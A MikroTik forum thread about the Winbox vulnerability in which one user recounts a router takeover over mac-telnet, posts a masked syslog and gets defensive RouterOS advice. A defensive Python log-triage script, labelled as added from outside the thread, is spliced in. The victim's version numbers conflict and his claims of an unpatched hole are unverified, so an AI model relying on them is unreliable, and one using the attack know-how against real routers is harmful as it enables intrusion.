That's my opinion based on 30 years of experience as a system engineer/admin. I don't say it lightly.

Here, in the country I am from, all home-based router CPEs belong to providers and are directly managed by them. If you use MT, it will in most cases be behind their router with port forwarding enabled.

Br,
Sasa
Just to be sure, I would like to say, that by " should be in default configuration" I don't mean "it should be default value". Yes, default value (when you erase configuration) should be "off", in "default configuration" (the factory default when you turn on the device for the first time) it imho should be "on".

The reason is simple: if you just connect the device to the network and you don't care about the config at all, it becomes a ticking bomb for the rest of the network - this is the way to partially fix this kind of behavior (as it happens, and you cannot do anything about it). It's a similar thing to the default configuration that forbids logon from the WAN port. If you reset the configuration (which is what we usually do after a RoS/firmware update), the option for autoupdate will be set to "off" and you can configure it yourself as you want.

Re: Winbox vulnerability: please upgrade

Posted: Mon Nov 05, 2018 11:00 pm
by CsXen
Hi.

if you just connect the device to the network and you don't care about the config at all, it becomes a ticking bomb for the rest of the network

Well... our good old RB532As get no security updates, because MT retired the MIPSLE branch, not backporting any security update.
And the latest release (6.33.4) is vulnerable... so we rolled back to 6.27, which is virtually not vulnerable.
We have no chance to filter the WAN side, because the Android WinBox app over a mobile network comes from "random" IPs.
And we have no funds to change the hardware, because they work for a charity on some very remote sites.
What to do? Should I blame MT for their ignorance? Or just pray and hope that no vulnerability will be found in the old 6.27?

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Mon Nov 05, 2018 11:45 pm
by caresss
With my total respect to Mikrotik let me tell you guys again that your ROS 6.43.4 is still vulnerable and tonight I was playing with the hacker by closing every single door to access my router. He was kind enough not to directly change my password and kick me out ... He was just playing with some mangle rules and using my gateway to increase the traffic through whatever he needs making my WAN graph full all the time.

Regardless of all, I locked all IP services and changed the default ports to something way far from the original. Created a syslog dedicated to this mikrotik RB2011UiAS where I wanted to see what was going on. Initially, the hacker was using my username to gain access again and to unbind winbox and telnet from the internet IP I was locking them to, not keeping them.

I realized that and rapidly deleted all users and created a totally new crazy user with a hard to guess password. All of a sudden, while I was still in the mikrotik session, tracing the log I saw him get in again through mac-telnet; he scans what's changed and logs back on from winbox :| "Casper". (While using telnet nothing is logged; it is the first time I know this!)

After that, I dropped all the ways for him to access the router-board... added his mac-address which appeared in mikrotik's log to filter rules "input,forward,output" dropping everything possible from his way... Suddenly, after a few minutes, while I was still inside the mikrotik session, the router rebooted and I got kicked out! He did it this time and changed the password; I knew that from the Syslog!!!!! It was logged because he ran to change the pass prior to entering and kicking me out and prior to changing the log location, so I had the chance to read what happened while I was kicked out.

Unfortunately, it seems I have no choice except resetting the router, but I am truly so highly disappointed with Mikrotik, whose hardware/software I have used personally for almost 14 years without a headache... With this vulnerability still active my reliance on Mikrotik is 0 and I will be replacing all my companies' firewalls/routers with something more rigid.

Sorry guys but we no longer have trust in your stuff.

Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:05 am
by CsXen
Hi.
If you can, try to switch on the packet sniffer and log everything to and from your WinBox/API port, and stream it to another machine to record it.
It can probably help to discover and resolve the problem.

Best regards: CsXen

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:08 am
by honzam
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
Do you have proof? For example, screenshots or something?

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:11 am
by caresss
Hi.
If you can, try to switch on the packet sniffer and log everything to and from your WinBox/API port, and stream it to another machine to record it.
It can probably help to discover and resolve the problem.

Best regards: CsXen
I will do so when I reset the router in order to gain access back to it ...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:11 am
by honzam
Hi.

if you just connect the device to the network and you don't care about the config at all, it becomes a ticking bomb for the rest of the network
We have no chance to filter the WAN side, because the Android WinBox app over a mobile net comes from "random" IPs
You can use a VPN for remote access. It's simple, and then the WAN can be easily filtered...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:13 am
by caresss
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
Do you have proof? For example, screenshots or something?
I have a full Syslog!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:15 am
by caresss
Hi.

if you just connect the device to the network and you don't care about the config at all, it becomes a ticking bomb for the rest of the network
We have no chance to filter the WAN side, because the Android WinBox app over a mobile net comes from "random" IPs
You can use a VPN for remote access. It's simple, and then the WAN can be easily filtered...
I secured the router perfectly, closing every single door! Filtering and blocking the mac address of the attacker didn't do anything! Where is mikrotik on that!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:18 am
by honzam
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
Do you have proof? For example, screenshots or something?
I have a full Syslog!
And? Can you share it with us? Or with support@mikrotik.com

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:20 am
by caresss
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
Do you have proof? For example, screenshots or something?
I have a full Syslog!
And? Can you share it with us? Or with support@mikrotik.com
I will mask the users and mac address and post the log!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 12:55 am
by caresss
Fix ROS6.43.3 because I am sure 10000% it is still vulnerable and I saw the proof tonight with a very long fight.
Do you have proof? For example, screenshots or something?
I have a full Syslog!
And? Can you share it with us? Or with support@mikrotik.com
Date Time Message Text
#Password changed and I cannot access the router anymore!
11/5/18 22:38:15 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
#It seems he rebooted the router and I was unable to login as you see a failure below!
11/5/18 22:38:08 system,error,critical login failure for user NewUserCreated from 192.168.my.ip via winbox
11/5/18 22:37:52 interface,info ether5 link up (speed 1G, full duplex)
11/5/18 22:37:52 interface,info ether3 link up (speed 1G, full duplex)
11/5/18 22:37:52 interface,info ether1 link up (speed 1G, full duplex)
11/5/18 22:37:52 interface,info ether9 link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether8 link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether7-WAN link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether4 link up (speed 100M, full duplex)
11/5/18 22:37:52 interface,info ether2-WAN link up (speed 100M, full duplex)
11/5/18 22:37:08 system,info,account user NewUserCreated logged out from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:37:08 system,info,account user NewUserCreated logged out from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:37:08 system,info,account user NewUserCreated logged out from 192.168.my.ip via winbox
11/5/18 22:36:56 system,info user NewUserCreated changed by NewUserCreated
11/5/18 22:32:56 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:32:10 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 22:32:08 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 22:29:55 interface,info ether9up (speed 100M, full duplex)
11/5/18 22:29:53 system,info device changed by NewUserCreated
11/5/18 22:29:45 system,info filter rule changed by NewUserCreated
11/5/18 22:29:15 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 22:29:10 system,info filter rule added by NewUserCreated
11/5/18 22:29:09 system,info filter rule added by NewUserCreated
11/5/18 22:29:07 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 22:22:47 system,info,account user NewUserCreated logged out from ??:3B:??:22:??:AC via mac-telnet
11/5/18 22:22:21 system,info device changed by NewUserCreated
#This is the interface he was attacking from. I trusted the mikrotik filter more than disabling the interface BUT he was faster this time to change the newuserpass keeping me out!
11/5/18 22:22:21 interface,info ether9 link down
11/5/18 22:18:01 system,info arp entry changed by NewUserCreated
11/5/18 22:09:11 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 22:07:22 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 22:03:30 system,info mangle rule removed by NewUserCreated
11/5/18 22:03:25 system,info mangle rule removed by NewUserCreated
11/5/18 22:00:47 system,info,account user NewUserCreated logged in from 192.168.my.ip via winbox
11/5/18 21:59:49 system,info,account user NewUserCreated logged out from 192.168.my.ip via winbox
#This tells that I lost hope with everything and I had no other chance than adding a filter rule to block his mac-address from input,forward,output! BUT nothing worked!
11/5/18 21:59:15 system,info filter rule added by NewUserCreated
11/5/18 21:59:03 system,info filter rule added by NewUserCreated
11/5/18 21:58:49 system,info filter rule added by NewUserCreated
#I can't believe it, how come he knew so rapidly the exact newly created user!
11/5/18 21:56:36 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
#After I cleaned fully my mikrotik he tried to login with the old deleted user as you can see below!
11/5/18 21:55:58 system,error,critical login failure for user OldDeletedUser from ??:3B:??:22:??:AC via mac-telnet
11/5/18 21:54:18 system,info address changed by NewUserCreated
11/5/18 21:54:14 system,info address changed by NewUserCreated
11/5/18 21:54:09 system,info address changed by NewUserCreated
11/5/18 21:54:05 system,info address changed by NewUserCreated
11/5/18 21:54:00 system,info address changed by NewUserCreated
11/5/18 21:53:44 system,info address changed by NewUserCreated
11/5/18 21:53:41 system,info address changed by NewUserCreated
11/5/18 21:53:12 system,info address added by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:53:07 system,info address changed by NewUserCreated
11/5/18 21:52:55 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:52:44 system,info address changed by NewUserCreated
11/5/18 21:51:21 system,info nat rule changed by NewUserCreated
11/5/18 21:50:20 system,info address changed by NewUserCreated
11/5/18 21:50:06 system,info route changed by NewUserCreated
11/5/18 21:50:03 system,info route changed by NewUserCreated
11/5/18 21:49:32 system,info,account user NewUserCreated logged out from 192.168.my.ip via telnet
11/5/18 21:49:14 system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
11/5/18 21:47:47 system,info address changed by NewUserCreated
11/5/18 21:46:42 system,info route changed by NewUserCreated
11/5/18 21:44:30 system,info nat rule changed by NewUserCreated
11/5/18 21:44:29 system,info nat rule changed by NewUserCreated
11/5/18 21:43:13 system,info nat rule changed by NewUserCreated

I masked his mac and some ips ... after his last mac-telnet and login, logging stopped and I was no longer able to login again.
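As an added example (not code from the thread or from MikroTik), this is the triage a defender would run over a remote syslog like the one posted above: it parses the "date time topics message" lines, flags logins over mac-telnet/mac-winbox from MACs not on an allowlist (Layer-2 access that the /ip firewall MAC drop rules above could not stop), records login failures, and correlates configuration changes that follow such a login. The sample lines, user names, MAC and IP values are constructed for the demo.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional

# Line shape of the syslog pasted in the thread: "11/5/18 22:38:15 system,info,account user ... "
LINE_RE = re.compile(
    r"^(?P<date>\d{1,2}/\d{1,2}/\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<topics>[\w,]+) (?P<msg>.+)$"
)
LOGIN_RE = re.compile(
    r"user (?P<user>\S+) logged (?P<dir>in|out) from (?P<src>\S+) via (?P<via>\S+)"
)
FAIL_RE = re.compile(
    r"login failure for user (?P<user>\S+) from (?P<src>\S+) via (?P<via>\S+)"
)
# Configuration-change messages look like "filter rule added by <user>".
CHANGE_RE = re.compile(r"^(?P<obj>.+?) (?P<action>added|changed|removed) by (?P<user>\S+)$")

# Layer-2 management methods; these never traverse /ip firewall chains, so a
# src-mac-address drop rule there cannot block them (see the discussion above).
L2_METHODS = {"mac-telnet", "mac-winbox"}


@dataclass
class Event:
    ts: datetime
    topics: tuple
    msg: str


@dataclass
class Finding:
    ts: datetime
    kind: str
    detail: str


def parse_line(line: str) -> Optional[Event]:
    """Parse one syslog line; the header and '#' comment lines yield None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{m['date']} {m['time']}", "%m/%d/%y %H:%M:%S")
    return Event(ts, tuple(m["topics"].split(",")), m["msg"])


def triage(lines, trusted_macs=frozenset(), window=timedelta(minutes=10)) -> List[Finding]:
    """Flag L2 (MAC) logins from non-allowlisted MACs, login failures, and config
    changes made by that account within `window` after such an L2 login.
    The forum paste is newest-first, so events are sorted before correlating."""
    events = [e for e in map(parse_line, lines) if e is not None]
    events.sort(key=lambda e: e.ts)
    trusted = {mac.upper() for mac in trusted_macs}
    findings: List[Finding] = []
    l2_logins = []  # (timestamp, user) of untrusted-MAC logins seen so far
    for e in events:
        if "account" in e.topics:
            m = LOGIN_RE.search(e.msg)
            if (m and m["dir"] == "in" and m["via"] in L2_METHODS
                    and m["src"].upper() not in trusted):
                findings.append(Finding(e.ts, "l2-login-untrusted",
                                        f"{m['user']} via {m['via']} from {m['src']}"))
                l2_logins.append((e.ts, m["user"]))
            continue
        if "error" in e.topics:
            m = FAIL_RE.search(e.msg)
            if m:
                findings.append(Finding(e.ts, "login-failure",
                                        f"{m['user']} from {m['src']} via {m['via']}"))
            continue
        m = CHANGE_RE.match(e.msg)
        if m and any(t <= e.ts <= t + window and u == m["user"] for t, u in l2_logins):
            findings.append(Finding(e.ts, "change-after-l2-login",
                                    f"{m['obj']} {m['action']} by {m['user']}"))
    return findings


# Constructed sample in the same newest-first layout as the posted log (not real data).
SAMPLE_LOG = """\
Date Time Message Text
#operator note: password changed, locked out (comment lines are skipped)
11/5/18 22:38:15 system,info,account user admin2 logged in from AA:BB:CC:DD:EE:01 via mac-telnet
11/5/18 22:38:08 system,error,critical login failure for user admin2 from 192.168.88.10 via winbox
11/5/18 22:37:52 interface,info ether9 link up (speed 100M, full duplex)
11/5/18 22:36:56 system,info user admin2 changed by admin2
11/5/18 22:32:56 system,info,account user admin2 logged in from AA:BB:CC:DD:EE:01 via mac-telnet
11/5/18 22:32:08 system,info,account user admin2 logged in from 192.168.88.10 via telnet
11/5/18 22:29:45 system,info filter rule changed by admin2
11/5/18 21:55:58 system,error,critical login failure for user olduser from AA:BB:CC:DD:EE:01 via mac-telnet
11/5/18 21:44:29 system,info nat rule changed by admin2
11/5/18 21:40:00 system,info,account user admin2 logged in from 192.168.88.10 via winbox
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f.ts.strftime("%H:%M:%S"), f.kind, f.detail)
```

Passing the MAC of your own management host in `trusted_macs` suppresses the L2-login findings for it while login failures are still reported.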

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 2:07 am
by vecernik87
Thanks for sharing! This does not look good and support staff should be notified. However, unless we give them some better info (ideally a packet capture from a TAP) I do not believe they will be able to help. I can personally confirm that the known attack vector was closed. (I still have a few devices on purpose with older ROS. I can hack them (i.e. steal passwords from any user) but the same approach does not work on new ROS). There might be another unknown attack vector. In addition, as far as I know, the file with readable passwords is still available in current ROS versions:
What's new in 6.43 (2018-Sep-06 12:44):
....
*) user - all passwords are now hashed and encrypted, plaintext passwords are kept for downgrade (will be removed in later upgrades);
Therefore if there is still some other way to access the file, it means it is still possible to get the password of any user.

I will not speculate about possible reasons in your situation. There are many possibilities, including an unknown vulnerability or an incorrect way of resetting the device (maybe you didn't wipe it completely, or you had it unprotected and connected for a few minutes while the attacker had enough time to implant some backdoor). Such speculation is wild guessing without knowing what really happened.

Anyway, you mentioned that your firewall rule for the MAC address did not work. I can confirm such behavior - MAC winbox/telnet cannot be filtered using /ip firewall rules. For example, the following code won't do anything:
/ip firewall raw add action=drop chain=prerouting src-mac-address=3C:97:0E:D7:XX:XX
I believe that is happening because MAC winbox/telnet communication is not IP communication, therefore it does not go through the "routing" block shown in the packet flow and therefore it does not go through any chain available in /ip firewall. (However, the packet count of such a rule still increases, which is weird...)
The only way I found to filter incoming non-IP communication is by creating a bridge over a single interface and using /interface bridge filter. This unfortunately breaks other behavior, because the bridge will be in a running state even if you disconnect the cable from your ethernet port.
Another way to block access to your MAC winbox/telnet is to use the correct interface-list in /tool mac-server and /tool mac-server mac-winbox. Simply said - there should be no MAC access to your device from the WAN port. Can you please clear up whether the attacker was accessing your device from the WAN, and whether you had enabled/disabled MAC access on the WAN interface?

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 9:09 am
by Karas
I masked his mac and some ips ... after his last mac-telnet and login, logging stopped and I was no longer able to login again.
Um, quick question.
Isn't this hacker on your local network?
All the IPs I'm seeing are local (unless I skipped over something), and logging in via mac-telnet...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 10:02 am
by Jotne
With my total respect to Mikrotik let me tell you guys again that your ROS 6.43.4 is still vulnerable ....
Is this the first time this router has been hacked?
Have you done netinstall and added config from scratch?

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 10:41 am
by td32
you can change the password all day long, but if someone has remote access to your PC they most probably have installed a keylogger also
11/5/18 22:38:15 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 10:59 am
by nescafe2002
Can you identify the MAC address (mac vendor)?

Have you tried looking it up via ip/arp / bridge/hosts or switch/hosts after regaining access to check which interface it is connected to?

Have you cross-checked with your own machines and ensured it isn't a local device?

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 11:21 am
by Deantwo
Hey caresss

As mentioned by vecernik87, MAC-Telnet and MAC-WinBox are not IP protocols, so an IP firewall will do nothing to block them. You need to configure your interface list to prevent access from any untrusted networks.

The fact that the attacker is using MAC-Telnet or MAC-WinBox means that they have direct access to your router. This can mean that they are INSIDE your network, or maybe they have hacked your ISP's router and are attacking you from there. Assuming that it isn't from inside your own network, simply exclude your WAN interface from the mactel and mac-winbox interface lists.
For example:
/interface list member print
/interface list member remove [find list~"^mac" interface="WAN"]
/interface list member print

I don't know why you were even fighting the hacker, just unplug the ethernet cables. Then you can reset the router and fix the issues. If you need time to get to the router, you can use the shutdown command so the router goes offline until you manually reboot it by power cycling.
For example:
/system shutdown
y

I suggest netinstalling the router, to be sure that nothing nasty has happened.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

You can e-mail support@mikrotik.com and they might have more/better suggestions.

By the way if it is your ISP that has been hacked, you might want to let them know. Because if your ISP is compromised, then EVERYTHING you send over the internet is vulnerable to man-in-the-middle attacks.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:42 pm
by caresss
Thanks for sharing! This does not look good and support staff should be notified. However, unless we give them some better info (ideally a packet capture from a TAP) I do not believe they will be able to help. I can personally confirm that the known attack vector was closed. (I still have a few devices on purpose with older ROS. I can hack them (i.e. steal passwords from any user) but the same approach does not work on new ROS). There might be another unknown attack vector. In addition, as far as I know, the file with readable passwords is still available in current ROS versions:
What's new in 6.43 (2018-Sep-06 12:44):
....
*) user - all passwords are now hashed and encrypted, plaintext passwords are kept for downgrade (will be removed in later upgrades);
Therefore if there is still some other way to access the file, it means it is still possible to get the password of any user.

I will not speculate about possible reasons in your situation. There are many possibilities, including an unknown vulnerability or an incorrect way of resetting the device (maybe you didn't wipe it completely, or you had it unprotected and connected for a few minutes while the attacker had enough time to implant some backdoor). Such speculation is wild guessing without knowing what really happened.

Anyway, you mentioned that your firewall rule for the MAC address did not work. I can confirm such behavior - MAC winbox/telnet cannot be filtered using /ip firewall rules. For example, the following code won't do anything:
/ip firewall raw add action=drop chain=prerouting src-mac-address=3C:97:0E:D7:XX:XX
I believe that is happening because MAC winbox/telnet communication is not IP communication, therefore it does not go through the "routing" block shown in the packet flow and therefore it does not go through any chain available in /ip firewall. (However, the packet count of such a rule still increases, which is weird...)
The only way I found to filter incoming non-IP communication is by creating a bridge over a single interface and using /interface bridge filter. This unfortunately breaks other behavior, because the bridge will be in a running state even if you disconnect the cable from your ethernet port.
Another way to block access to your MAC winbox/telnet is to use the correct interface-list in /tool mac-server and /tool mac-server mac-winbox. Simply said - there should be no MAC access to your device from the WAN port. Can you please clear up whether the attacker was accessing your device from the WAN, and whether you had enabled/disabled MAC access on the WAN interface?
Thanks for your time replying with all the above! Yes, I was missing the mac access, and when I wanted to take over and set them to none he trapped me and kicked me out. Anyway, ether9 is the LAN to the ISP for the microwave link with inter-branching! When he realized that I was aware of the situation he started resetting every single router on the ISP side, almost 30 mikrotik APs with ROS versions below 6.40...

The story ended up with netinstalling the main backbone which he attacked and restoring all the mikrotik APs after he reset them all, and locking everything, even the mac side, with the latest OS. He wasn't that smart, but it was the OS's fault. Anyway, thank God all is back to normal now after dealing with almost 80 routers and switches. Absolutely a pain in the neck, and applause for Mikrotik over that :))

We were born to learn so every day is a new school day in this new techie era!
Have a calm eve...

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:54 pm
by caresss
With my total respect to Mikrotik let me tell you guys again that your ROS 6.43.4 is still vulnerable ....
Is this the first time this router has been hacked?
Have you done netinstall and added config from scratch?
Unfortunately, it wasn't the 1st time. I was cleaning up after him every time, but he kept getting back in through that mac-telnet and again mac-winbox. Absolutely Casper! Until yesterday, when I decided for the 1st time to install a remote syslog! From that syslog I was able to trace his prints, and started to fight back and clean up all that he did... The funny thing is that while on mac-telnet, whatever you do, the log will not catch it!!! I was expecting to see some commands but nothing! I never knew this :)

A piece of advice: don't take things carelessly, and absolutely install syslog, because it is very essential for everything and especially security, which comes 1st.
But I confirm 10000% that I updated the ROS to 6.34.4 and it was absolutely clean, with a totally new user and a very long and complicated pass... It took him seconds to guess the user and log on with it! I was so sure he was out: no scripts, no packet sniffing config, no php file in files, nothing and absolutely nothing so he could guess the user. In seconds he guessed it!!! That truly frightened me and I gave up somehow, knowing that whatever I did he would keep coming back. What happened happened and the lesson was learned.

I believe he sniffed the packets between the latest winbox session from my side and the routerboard. There's still somehow a hidden vulnerability!

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:58 pm
by caresss
Can you identify the MAC address (mac vendor)?

Have you tried looking it up via ip/arp / bridge/hosts or switch/hosts after regaining access to check which interface it is connected to?

Have you crossed checked with your own machines and ensured it isn't a local device?
Didn't bother to look! This mac was another routerboard switch connected to the inter-branching. Probably he natted the port from a PC or winbox-enabled OS to the machine with this mac to get a different mac than the real one! Mysterious :)

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 6:59 pm
by caresss
you can change the password all day long, but if someone has remote access to your PC they most probably have installed a keylogger also
11/5/18 22:38:15 system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from ??:3B:??:22:??:AC via mac-telnet
system,info,account user NewUserCreated logged in from 192.168.my.ip via telnet
No way :) I am a specialist, I use MacOS and it is very clean. 0 chance for a keylogger.

Re: Winbox vulnerability: please upgrade

Posted: Tue Nov 06, 2018 7:01 pm
by caresss
Hey caresss

As mentioned by vecernik87, MAC-Telnet and MAC-WinBox are not IP protocols, so an IP firewall will do nothing to block them. You need to configure your interface list to prevent access from any untrusted networks.

The fact that the attacker is using MAC-Telnet or MAC-WinBox means that they have direct access to your router. This can mean that they are INSIDE your network, or maybe they have hacked your ISP's router and are attacking you from there. Assuming that it isn't from inside your own network, simply exclude your WAN interface from the mactel and mac-winbox interface lists.
For example:
/interface list member print
/interface list member remove [find list~"^mac" interface="WAN"]
/interface list member print

I don't know why you were even fighting the hacker, just unplug the ethernet cables. Then you can reset the router and fix the issues. If you need time to get to the router, you can use the shutdown command so the router goes offline until you manually reboot it by power cycling.
For example:
/system shutdown
y

I suggest netinstalling the router, to be sure that nothing nasty has happened.
See: https://wiki.mikrotik.com/wiki/Manual:Netinstall

You can e-mail support@mikrotik.com and they might have more/better suggestions.

By the way if it is your ISP that has been hacked, you might want to let them know. Because if your ISP is compromised, then EVERYTHING you send over the internet is vulnerable to man-in-the-middle attacks.
I was so far from that location, and when I wanted to act badly he was faster :) anyway, thank God things went OK this morning and I rescued everything after a very difficult and stressful time.

I'll keep you posted guys if anything new will come up regarding this mysterious issue :)

Re: Winbox vulnerability: please upgrade

Posted: Wed Nov 07, 2018 12:49 pm
by msatter
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
https://www.zdnet.com/google-amp/articl ... k-routers/

Owners being angry at him should consider that someone from the outside could just walk into their router, which is not the intention. As a gray hat hacker you are on the wrong side of the law, but with good intentions and helping us all, it should not lead to consequences.

Re: Winbox vulnerability: please upgrade

Posted: Wed Nov 07, 2018 1:35 pm
by mozerd
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
https://www.zdnet.com/google-amp/articl ... k-routers/

Owners being angry at him should consider that someone from the outside could just walk into their router, which is not the intention. As a gray hat hacker you are on the wrong side of the law, but with good intentions and helping us all, it should not lead to consequences.
Based on my experience with MikroTik and MOAB, where I have been asked to remotely install the service, many of the router firewalls are misconfigured.
The value proposition that is MikroTik is such that it is very popular because MikroTik is POWERFUL, extensible and inexpensive. Very unfortunately a lot of these configurations are managed by people who have NO idea what they are doing, applying the worst possible firewall disciplines one can imagine --- so it's not at all surprising that a LOT get hacked.

IMO, MikroTik have provided the basic guidelines to effectively secure the router -- but when the undisciplined admin wants to expand on that capability they break the effective security model and get into trouble, enabling the bad guys to invade their territory.

Re: Winbox vulnerability: please upgrade

Posted: Wed Nov 07, 2018 2:22 pm
by Jotne
The hacker, who goes by the name of Alexey and says he works as a server administrator, claims to have disinfected over 100,000 MikroTik routers already.
Can anyone confirm this, or is it just bragging?
Has anyone seen a MT that has gotten an access list added to prevent external access?

Re: Winbox vulnerability: please upgrade

Posted: Mon Dec 24, 2018 10:17 pm
by ognjen
Hello,

after a year I came to a hotel that I once heard as a network engineer and I saw the following:

Image

RouterOS before upgrade 6.40.3.
So.. everyone can be attacker and victim!
Be careful - Upgrade RouterOS!

Re: Winbox vulnerability: please upgrade

Posted: Tue Dec 25, 2018 11:10 am
by pe1chl
That is exactly why such advice will not work as long as there is not some form of auto-upgrade...
You get a request from a hotel to install WiFi, you install and configure equipment that is up to date at that time, and you leave.
At that point there is not some hotel desk clerk reading the forum every day and acting upon topics like this.
So the router is left unmanaged. Why would you hire expensive service from a network admin to babysit a $100-$200 box?
And risks like this are the result.
So for an installation like that there should be some menu setting that makes it auto-update to some special release channel that only gets the important and well-tested updates. (You do not want it to track "stable" or even "long-term" and install a new version every couple of weeks when that is not required to fix problems, as it always induces a risk of failures.)

Re: Winbox vulnerability: please upgrade

Posted: Tue Dec 25, 2018 10:10 pm
by ognjen
@pe1chl You are right. But let's look at the problem with wireless in the new update 6.43.8. If I had set up an auto-upgrade, at the time of the upgrade the entire network would have stopped?! (In 6.43.7: Frequency 5920, Frequency Mode superchannel, Country romania. After upgrade to 6.43.8: Frequency auto, Frequency Mode regulatory-domain, Country romania. And the link is down :shock: )
I know, superchannel with country is a wrong conf.. but auto-upgrade can be dangerous in this example.

Re: Winbox vulnerability: please upgrade

Posted: Wed Dec 26, 2018 2:42 pm
by deanMKD1
Haven't noticed anything serious in 6.43.4 stable. Winbox port still open.

Re: Winbox vulnerability: please upgrade

Posted: Fri Dec 28, 2018 4:46 am
by gotsprings
When Mikrotik got rid of master slave... A BLIND update could really "screw some s__t up" on many configurations. And auto update would have resulted in disastrous results. That's what change logs are for, and why you read them before you hit UPDATE.

An unmanaged device gets hacked after the install???
Well it sucks for the person doing cleanup... Until they realize... "THE UNIT WAS UNMANAGED". If the system was set and forget or on break fix... This is a break... Time to fix.

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 1:30 pm
by m4t7e0
It has come to our attention that a rogue botnet is currently using the same vulnerability in the RouterOS Winbox service, that was patched in RouterOS v6.42.1 in April 23, 2018.

Since all RouterOS devices offer free upgrades with just two clicks, we urge you to upgrade your devices with the "Check for updates" button, if you haven't done so already.

Steps to be taken:

- Upgrade RouterOS to the latest release
- Change your password after upgrading
- Restore your configuration and inspect it for unknown settings. Delete SOCKS configurations, and any unknown scripts
- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

[UPDATED with specific versions]: Full details on what to do and what is affected: https://blog.mikrotik.com/security/winb ... ility.html

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
Thanks for this information; one of my devices (set up on 18 Dec), firmware version 6.42.10, had this "attack".

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 1:53 pm
by normis
@pe1chl You are right. But let's look at the problem with wireless in the new update 6.43.8. If I had set up an auto-upgrade, at the time of the upgrade the entire network would have stopped?! (In 6.43.7: Frequency 5920, Frequency Mode superchannel, Country romania. After upgrade to 6.43.8: Frequency auto, Frequency Mode regulatory-domain, Country romania. And the link is down :shock: )
I know, superchannel with country is a wrong conf.. but auto-upgrade can be dangerous in this example.
So why would your link be down? Clients connect to whatever frequency the SSID has set. And if you indeed have some very special purpose here, why did you set regulatory country ?

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 2:20 pm
by pe1chl
So why would your link be down?
I can't speak for his situation, but it is not really uncommon that a link goes down when one side changes frequency, e.g. because that frequency has interference at the other side, is not in the other side's allowed channel list (e.g. it is an outdoor AP that has the proper indoor/outdoor setting), or because the selected frequency has a lower allowed EIRP and thus the power is reduced.

Re: Winbox vulnerability: please upgrade

Posted: Thu Jan 03, 2019 2:24 pm
by normis
